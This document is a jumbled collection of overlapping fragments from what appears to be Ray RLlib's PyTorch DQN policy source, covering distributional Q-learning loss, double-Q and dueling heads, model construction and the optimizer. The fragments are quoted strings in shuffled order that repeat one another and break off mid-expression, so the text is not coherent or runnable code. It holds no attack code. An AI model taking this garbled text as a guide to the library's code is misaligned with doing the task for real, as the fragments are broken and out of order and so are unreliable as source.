ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t,", "explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals", "* (ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best *", "SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if config[\"num_atoms\"] >", "importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] =", "torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action", "TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from", "u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta", "return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch:", "models the policy has). 
policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy,", "= policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore,", "if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered", "torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t,", "if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean", "1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0,", "ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"],", "after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars =", "loss: TensorType) -> Dict[str, TensorType]: # Clip grads if configured.", "train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss", "DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats,", "= torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which is", "0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) #", "TensorType, *, explore: bool = True, is_training: bool = False,", "F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0,", "- torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) +", "def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars,", "r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0", "generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical", "v_min) / ((v_max - v_min) / float(num_atoms - 1)) lb", "discarded because (ub-b) == (b-lb) == 0. 
floor_equal_ceil = (ub", "dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 -", "import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio)", "state_score + advantages_centered else: value = action_scores return value, logits,", "q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if", "{} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try", "if num_atoms > 1: # Distributional Q-learning which corresponds to", "float(num_atoms - 1) # (batch_size, 1) * (1, num_atoms) =", "- 1, dtype=torch.float32) z = v_min + z * (v_max", "model, obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple)", "action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy(", "r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min)", "TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *,", "support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1))", "Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model,", "# Clip grads if configured. return apply_grad_clipping(policy, optimizer, loss) def", "TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {}", "integer, lb == ub, so pr_j(s', a*) will # be", "mu_delta # Rainbow paper claims that using this cross entropy", "Indispensable judgement which is missed in most implementations # when", "= torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection,", "= action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer:", "= { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error),", "= True, is_training: bool = False, **kwargs) -> Tuple[TensorType, type,", "support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action,", "= q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error))", "act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask", "def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore:", "# (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta =", "postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init,", "floor_equal_ceil = (ub - lb < 0.5).float() # (batch_size, num_atoms,", "train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def", "advantages_mean = reduce_mean_ignore_inf(action_scores, 
1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean,", "is done autoatically for the # policy.model, but not for", "PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy", "the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model:", "self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\":", "# Rainbow paper claims that using this cross entropy loss", "-> Dict[str, TensorType]: # Clip grads if configured. return apply_grad_clipping(policy,", "torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1)", "is robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected,", "= ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"],", "-1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS],", "* torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta #", "labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats = { #", "torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1)", "has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs:", "import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy", "try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing", "Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS],", "q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0,", "we know were selected in the given state. one_hot_selection =", "ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import", "num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project", "+ support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z *", "torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min) / ((v_max", "= (r_tau - v_min) / ((v_max - v_min) / float(num_atoms", "which we know were selected in the given state. 
one_hot_selection", "1) value = state_score + advantages_centered else: value = action_scores", "q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked # compute the", "best possible value starting from state at t + 1", "model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], #", "num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze(", "torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered else: value", "grads if configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy,", "} else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best #", "add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy:", "# Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model,", "t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net =", "most implementations # when b happens to be an integer,", "action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space,", "generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise)", "compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1)", "possible value starting from state at t + 1 if", "softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch()", "= F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1,", "paper claims that using this cross entropy loss for #", "return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return", "= False): config = policy.config model_out, state = model({ SampleBatch.CUR_OBS:", "q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best", "get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool", "from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error", "`prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error *", "compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation.", "compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for", "config = policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\":", "after each Dense # generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.target_q_func_vars =", "(action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out)", "lb = torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which", "q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1,", "__init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1,", "= False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy,", "SampleBatch) -> TensorType: config = policy.config # Q-network evaluation. q_t,", "and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss", "import Dict, List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy", "postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from", "which is missed in most implementations # when b happens", "= importance_weights # Do forward pass on loss to update", "= F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t,", "huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected),", "SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from", "given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t", "= QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"],", "logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out)", "config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out)", "None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy:", "value starting from state at t + 1 if config[\"double_q\"]:", "torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best", "policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2,", "policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. 
q_tp1,", "robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m)", "-> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space,", "train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net,", "gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: #", "raise UnsupportedSpaceException( \"Action space {} is not supported for DQN.\".format(action_space))", "build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def", "= compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network", "input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy,", "= torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze(", "+ 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values(", "corresponds to an entropy loss z = torch.range(0.0, num_atoms -", "None if nn: F = nn.functional class QLoss: def __init__(self,", "> FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected =", "LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space,", "pr_j(s', a*) will # be discarded because (ub-b) == (b-lb)", "pass on loss to update td error attribute build_q_losses(self, self.model,", "256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else:", "Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip", "from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model", "Move target net to device (this is done autoatically for", "return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG,", "(batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms) r_tau =", "q_tp1_best # compute RHS of bellman equation q_t_selected_target = rewards", "b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb)", "obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1", "nn: F = nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected,", "not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer", "( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model", "one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1)", "torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best", "UnsupportedSpaceException( \"Action space {} is not supported for 
DQN.\".format(action_space)) if", "gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not", "evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False,", "q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN,", "= torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action)", "b happens to be an integer, lb == ub, so", "# be discarded because (ub-b) == (b-lb) == 0. floor_equal_ceil", "try_import_torch() F = None if nn: F = nn.functional class", "1: # Distributional Q-learning which corresponds to an entropy loss", "None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits)", "size, otherwise fall back to 256 num_outputs = ([256] +", "import TensorType, TrainerConfigDict torch, nn = try_import_torch() F = None", "TensorType: config = policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t", "import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict", "autoatically for the # policy.model, but not for any other", "isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model =", "l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project *", "= model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if", "( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from", "+ gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z,", "torch.mean(self.td_error * importance_weights) self.stats = { # TODO: better Q", "(this is done autoatically for the # policy.model, but not", "if configured. 
return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict,", "return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model,", "state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy", "priority is robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits(", "self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights)", "= compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0] if", "q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1,", "ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import", "= compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space,", "ModelV2, obs_batch: TensorType, *, explore: bool = True, is_training: bool", "is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values", "q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best", "= rewards + gamma**n_step * q_tp1_best_masked # compute the error", "policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection", "policy.model, but not for any other models the policy has).", "== ub, so pr_j(s', a*) will # be discarded because", "__init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict =", "> 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = (", "action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"],", "config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) ->", "TODO: better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), }", "v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm", "def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType: config", "build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr,", "= support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores", "framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"],", "> 1: # Distributional Q-learning which corresponds to an entropy", "dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action =", "= (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step", "Policy, obs_space, 
action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"])", "= v_min + z * (v_max - v_min) / float(num_atoms", "this cross entropy loss for # priority is robust and", "None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space,", "explore, is_training: bool = False): config = policy.config model_out, state", "but not for any other models the policy has). policy.target_q_model", "policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE,", "compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})", "\"Action space {} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]:", "model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1)", "= support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1)", "probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"]", "probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str,", "TensorType) -> Dict[str, TensorType]: # Clip grads if configured. return", "Dict[str, TensorType]: # Clip grads if configured. return apply_grad_clipping(policy, optimizer,", "apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from", "update td error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error", "policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool =", "}, [], None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action,", "judgement which is missed in most implementations # when b", "Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked", "config) # Move target net to device (this is done", "(batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best", "support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered", "+ gamma**n_step * q_tp1_best_masked # compute the error (potentially clipped)", "q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best # compute RHS", "torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of", "1)) lb = torch.floor(b) ub = torch.ceil(b) # Indispensable judgement", "support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1)", "td error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error", "Move option to add LayerNorm after each Dense # generically", "from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2", "target net to device (this is done autoatically for the", "for the # 
policy.model, but not for any other models", "tuple) else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, []", "Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy:", "which corresponds to an entropy loss z = torch.range(0.0, num_atoms", "else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze(", "equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked # compute", "= torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate", "1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores,", "\"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config:", "extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin,", "LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars", "torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered", "* one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1),", "input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES]", "bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals =", "z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits)", "q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True)", "F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN,", "input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values}", "reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn =", "= act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] =", "z = v_min + z * (v_max - v_min) /", "-> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action", "Policy, model: 